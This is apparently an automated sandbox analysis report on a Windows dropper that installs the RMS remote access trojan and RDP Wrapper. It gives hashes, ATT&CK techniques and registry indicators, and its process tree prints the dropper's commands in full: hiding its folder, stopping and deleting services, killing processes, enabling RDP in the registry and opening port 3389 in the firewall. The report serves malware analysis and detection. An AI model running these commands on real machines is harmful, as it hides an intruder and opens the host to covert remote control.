rms | 7bdba11575e35a256352e15ea53f5b17d9ba3713511ea7404c6f9a85313d4f32

Analysis

max time kernel
148s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27-11-2024 14:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a84fbfcea2b58022e607879037439034_JaffaCakes118.exe
Size

6.8MB
MD5

a84fbfcea2b58022e607879037439034
SHA1

0206c493ddd26d98da41b2275f58650ccd51b2a3
SHA256

7bdba11575e35a256352e15ea53f5b17d9ba3713511ea7404c6f9a85313d4f32
SHA512

095086ae0b2b0157d7af8d34a3345484c934e7d1c5e14d7a98a823d7e3ff1e355418282e15f86406ca43fb51a632be438b6c0b87dfbb90301a6ab79c8c8a9ea4
SSDEEP

196608:FK5Kz2OOHyL6NfhPLfxyN27aTD/XTiNvaVLQuqxF4:GKz2OIq6xfa3/XTiNieF4

Score

10^/10

rms defense_evasion discovery evasion execution persistence privilege_escalation rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exe

pid	Process
4656	netsh.exe
2372	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

RDPWInst.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exe

pid	Process
2900	attrib.exe
1700	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RDPWrapper_run.exeWinUpdate1.exea84fbfcea2b58022e607879037439034_JaffaCakes118.exeWinDevInstall.exestart.exeRDP.exestart1.exeWinUpdate.exeRDPWrapper.exerun.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	RDPWrapper_run.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WinUpdate1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WinDevInstall.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	RDP.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	start1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WinUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	RDPWrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	run.exe

Executes dropped EXE 20 IoCs

Processes:

WinDevInstall.exestart1.exestart.exeBuilder.exeBuilder2.exeWinUpdate.exeRDP.exeRDPWrapper_run.exeRDPWrapper.exeWinUpdate1.exerun.exeCDevice.exeCDevice.exeCDevice.exeRDPWInst.exeCDevice.exesysdevices.exesysdevices.exeRDPWInst.exesysdevices.exe

pid	Process
3744	WinDevInstall.exe
3608	start1.exe
2268	start.exe
4872	Builder.exe
3712	Builder2.exe
3320	WinUpdate.exe
2156	RDP.exe
1052	RDPWrapper_run.exe
1628	RDPWrapper.exe
3680	WinUpdate1.exe
3448	run.exe
2880	CDevice.exe
2816	CDevice.exe
4336	CDevice.exe
3148	RDPWInst.exe
764	CDevice.exe
1516	sysdevices.exe
3040	sysdevices.exe
2620	RDPWInst.exe
4376	sysdevices.exe

Loads dropped DLL 1 IoCs

Processes:

svchost.exe

pid	Process
1740	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
27	raw.githubusercontent.com
16	raw.githubusercontent.com
17	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

RDPWInst.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\root = "0"	reg.exe

Drops file in Program Files directory 2 IoCs

Processes:

RDPWInst.exe

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
1804	sc.exe
3820	sc.exe
4092	sc.exe
3668	sc.exe
560	sc.exe
4632	sc.exe
5052	sc.exe
4568	sc.exe
2120	sc.exe
3004	sc.exe
3108	sc.exe
1660	sc.exe
3024	sc.exe
4316	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

sysdevices.exenet1.exenet.exesc.exereg.exeregedit.exea84fbfcea2b58022e607879037439034_JaffaCakes118.exesc.exesc.exerun.exeRDPWrapper.exenet.exeWinUpdate1.exesc.exenetsh.exenet1.exestart.exeBuilder2.execmd.exesc.exeWinDevInstall.exeRDPWrapper_run.exesc.exeRDPWInst.exetaskkill.exenet.exeWinUpdate.exesc.exesc.exereg.exeCDevice.exesc.exesc.exeattrib.exeRDPWInst.exeattrib.exeRDP.exesysdevices.exenet1.exeCDevice.exestart1.exeBuilder.execmd.exeregedit.exereg.exeCDevice.exeCDevice.exesc.exesc.exetaskkill.exereg.exesc.exesysdevices.exesc.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysdevices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	run.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinUpdate1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	start.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Builder2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinDevInstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWrapper_run.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CDevice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDP.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysdevices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CDevice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	start1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Builder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CDevice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CDevice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysdevices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe

Kills process with taskkill 2 IoCs

evasion

Processes:

taskkill.exetaskkill.exe

pid	Process
3644	taskkill.exe
3068	taskkill.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid	Process
4064	regedit.exe
1460	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

CDevice.exeCDevice.exeCDevice.exeCDevice.exesysdevices.exesvchost.exe

pid	Process
2880	CDevice.exe
2880	CDevice.exe
2880	CDevice.exe
2880	CDevice.exe
2880	CDevice.exe
2880	CDevice.exe
2816	CDevice.exe
2816	CDevice.exe
4336	CDevice.exe
4336	CDevice.exe
764	CDevice.exe
764	CDevice.exe
764	CDevice.exe
764	CDevice.exe
764	CDevice.exe
764	CDevice.exe
1516	sysdevices.exe
1516	sysdevices.exe
1740	svchost.exe
1740	svchost.exe
1740	svchost.exe
1740	svchost.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
660
660

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

sysdevices.exe

pid	Process
4376	sysdevices.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

taskkill.exetaskkill.exeCDevice.exesvchost.exeCDevice.exeCDevice.exeRDPWInst.exesvchost.exe

description	pid	Process
Token: SeDebugPrivilege	3644	taskkill.exe
Token: SeDebugPrivilege	3068	taskkill.exe
Token: SeDebugPrivilege	2880	CDevice.exe
Token: SeAuditPrivilege	4612	svchost.exe
Token: SeDebugPrivilege	4336	CDevice.exe
Token: SeTakeOwnershipPrivilege	764	CDevice.exe
Token: SeTcbPrivilege	764	CDevice.exe
Token: SeTcbPrivilege	764	CDevice.exe
Token: SeDebugPrivilege	3148	RDPWInst.exe
Token: SeAuditPrivilege	1740	svchost.exe

Suspicious use of SetWindowsHookEx 21 IoCs

Processes:

start1.exestart.exeBuilder.exeBuilder2.exeWinUpdate.exeRDP.exeRDPWrapper_run.exeRDPWrapper.exeWinUpdate1.execmd.exerun.execmd.exeCDevice.exeCDevice.exeCDevice.exeRDPWInst.exeCDevice.exeRDPWInst.exe

pid	Process
3608	start1.exe
2268	start.exe
4872	Builder.exe
3712	Builder2.exe
3320	WinUpdate.exe
2156	RDP.exe
1052	RDPWrapper_run.exe
1628	RDPWrapper.exe
3680	WinUpdate1.exe
1372	cmd.exe
3448	run.exe
212	cmd.exe
2880	CDevice.exe
2880	CDevice.exe
2816	CDevice.exe
2816	CDevice.exe
4336	CDevice.exe
3148	RDPWInst.exe
4336	CDevice.exe
764	CDevice.exe
2620	RDPWInst.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a84fbfcea2b58022e607879037439034_JaffaCakes118.exeWinDevInstall.exestart1.exestart.exeRDP.exeRDPWrapper_run.exeWinUpdate.exeWinUpdate1.execmd.exe

description	pid	Process	procid_target
PID 3104 wrote to memory of 3744	3104	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe	83
PID 3104 wrote to memory of 3744	3104	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe	83
PID 3104 wrote to memory of 3744	3104	a84fbfcea2b58022e607879037439034_JaffaCakes118.exe	83
PID 3744 wrote to memory of 3608	3744	WinDevInstall.exe	85
PID 3744 wrote to memory of 3608	3744	WinDevInstall.exe	85
PID 3744 wrote to memory of 3608	3744	WinDevInstall.exe	85
PID 3608 wrote to memory of 2268	3608	start1.exe	87
PID 3608 wrote to memory of 2268	3608	start1.exe	87
PID 3608 wrote to memory of 2268	3608	start1.exe	87
PID 2268 wrote to memory of 4872	2268	start.exe	88
PID 2268 wrote to memory of 4872	2268	start.exe	88
PID 2268 wrote to memory of 4872	2268	start.exe	88
PID 2268 wrote to memory of 3712	2268	start.exe	89
PID 2268 wrote to memory of 3712	2268	start.exe	89
PID 2268 wrote to memory of 3712	2268	start.exe	89
PID 2268 wrote to memory of 3320	2268	start.exe	90
PID 2268 wrote to memory of 3320	2268	start.exe	90
PID 2268 wrote to memory of 3320	2268	start.exe	90
PID 2268 wrote to memory of 2156	2268	start.exe	91
PID 2268 wrote to memory of 2156	2268	start.exe	91
PID 2268 wrote to memory of 2156	2268	start.exe	91
PID 2156 wrote to memory of 1052	2156	RDP.exe	92
PID 2156 wrote to memory of 1052	2156	RDP.exe	92
PID 2156 wrote to memory of 1052	2156	RDP.exe	92
PID 1052 wrote to memory of 1628	1052	RDPWrapper_run.exe	93
PID 1052 wrote to memory of 1628	1052	RDPWrapper_run.exe	93
PID 1052 wrote to memory of 1628	1052	RDPWrapper_run.exe	93
PID 3320 wrote to memory of 3680	3320	WinUpdate.exe	94
PID 3320 wrote to memory of 3680	3320	WinUpdate.exe	94
PID 3320 wrote to memory of 3680	3320	WinUpdate.exe	94
PID 3680 wrote to memory of 1372	3680	WinUpdate1.exe	95
PID 3680 wrote to memory of 1372	3680	WinUpdate1.exe	95
PID 3680 wrote to memory of 1372	3680	WinUpdate1.exe	95
PID 1372 wrote to memory of 2900	1372	cmd.exe	97
PID 1372 wrote to memory of 2900	1372	cmd.exe	97
PID 1372 wrote to memory of 2900	1372	cmd.exe	97
PID 1372 wrote to memory of 4568	1372	cmd.exe	98
PID 1372 wrote to memory of 4568	1372	cmd.exe	98
PID 1372 wrote to memory of 4568	1372	cmd.exe	98
PID 1372 wrote to memory of 560	1372	cmd.exe	99
PID 1372 wrote to memory of 560	1372	cmd.exe	99
PID 1372 wrote to memory of 560	1372	cmd.exe	99
PID 1372 wrote to memory of 3024	1372	cmd.exe	100
PID 1372 wrote to memory of 3024	1372	cmd.exe	100
PID 1372 wrote to memory of 3024	1372	cmd.exe	100
PID 1372 wrote to memory of 4316	1372	cmd.exe	101
PID 1372 wrote to memory of 4316	1372	cmd.exe	101
PID 1372 wrote to memory of 4316	1372	cmd.exe	101
PID 1372 wrote to memory of 4632	1372	cmd.exe	102
PID 1372 wrote to memory of 4632	1372	cmd.exe	102
PID 1372 wrote to memory of 4632	1372	cmd.exe	102
PID 1372 wrote to memory of 3108	1372	cmd.exe	103
PID 1372 wrote to memory of 3108	1372	cmd.exe	103
PID 1372 wrote to memory of 3108	1372	cmd.exe	103
PID 1372 wrote to memory of 2120	1372	cmd.exe	148
PID 1372 wrote to memory of 2120	1372	cmd.exe	148
PID 1372 wrote to memory of 2120	1372	cmd.exe	148
PID 1372 wrote to memory of 1804	1372	cmd.exe	105
PID 1372 wrote to memory of 1804	1372	cmd.exe	105
PID 1372 wrote to memory of 1804	1372	cmd.exe	105
PID 1372 wrote to memory of 1660	1372	cmd.exe	106
PID 1372 wrote to memory of 1660	1372	cmd.exe	106
PID 1372 wrote to memory of 1660	1372	cmd.exe	106
PID 1372 wrote to memory of 3004	1372	cmd.exe	107

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exe

pid	Process
2900	attrib.exe
1700	attrib.exe

C:\Users\Admin\AppData\Local\Temp\a84fbfcea2b58022e607879037439034_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a84fbfcea2b58022e607879037439034_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3104
- C:\ProgramData\CardWindows\WinDevInstall.exe
  "C:\ProgramData\CardWindows\WinDevInstall.exe" -p7832489354378589235643543456
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3744
- - C:\ProgramData\CardWindows\start1.exe
    "C:\ProgramData\CardWindows\start1.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\ProgramData\CardWindows\start.exe
      "C:\ProgramData\CardWindows\start.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2268
    - - C:\ProgramData\CardWindows\Builder.exe
        
        "C:\ProgramData\CardWindows\Builder.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4872
    - - C:\ProgramData\CardWindows\Builder2.exe
        
        "C:\ProgramData\CardWindows\Builder2.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3712
    - - C:\ProgramData\CardWindows\WinUpdate.exe
        
        "C:\ProgramData\CardWindows\WinUpdate.exe" -p5387687645378674524512345389721228
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3320
      - C:\ProgramData\CardWindows\WinUpdate1.exe
        
        "C:\ProgramData\CardWindows\WinUpdate1.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\CardWindows\SysInstall.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1372
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\ProgramData\CardWindows"
        8⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2900
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop RManService
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4568
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop VDeviceCard
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:560
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop NPackStereo
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3024
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop ServiceWork
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4316
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop IntelDriver
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4632
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop AMIHardware
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3108
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete RManService
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2120
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete VDeviceCard
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1804
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete NPackStereo
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1660
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete ServiceWork
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3004
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete IntelDriver
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5052
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete AMIHardware
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3820
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im rfusclient.exe /f
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3644
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im rutserv.exe /f
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SYSTEM\Nvidia\Toolbar\DeviceCard" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3624
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "C:\ProgramData\CardWindows\config_set.reg"
        8⤵
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:4064
        
        C:\ProgramData\CardWindows\CDevice.exe
        
        "C:\ProgramData\CardWindows\CDevice.exe" /silentinstall
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2880
        
        C:\ProgramData\CardWindows\CDevice.exe
        
        "C:\ProgramData\CardWindows\CDevice.exe" /firewall
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2816
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "C:\ProgramData\CardWindows\config_set.reg"
        8⤵
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:1460
        
        C:\Windows\SysWOW64\sc.exe
        
        sc failure VDeviceCard reset= 0 actions= restart/500/restart/500/restart/500
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4092
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config VDeviceCard obj= LocalSystem type= interact type= own
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3668
        
        C:\ProgramData\CardWindows\CDevice.exe
        
        "C:\ProgramData\CardWindows\CDevice.exe" /start
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4336
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\ProgramData\CardWindows\*.*"
        8⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:1700
    - - C:\ProgramData\CardWindows\RDP.exe
        
        "C:\ProgramData\CardWindows\RDP.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2156
      - C:\ProgramData\RDP\RDPWrapper_run.exe
        
        "C:\ProgramData\RDP\RDPWrapper_run.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1052
        
        C:\ProgramData\RDP\RDPWrapper.exe
        
        "C:\ProgramData\RDP\RDPWrapper.exe" -p27852786784527827414245258638727424524124452741245527212
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1628
        
        C:\ProgramData\RDP\run.exe
        
        "C:\ProgramData\RDP\run.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\RDP\run.bat" "
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2204
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:4156
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
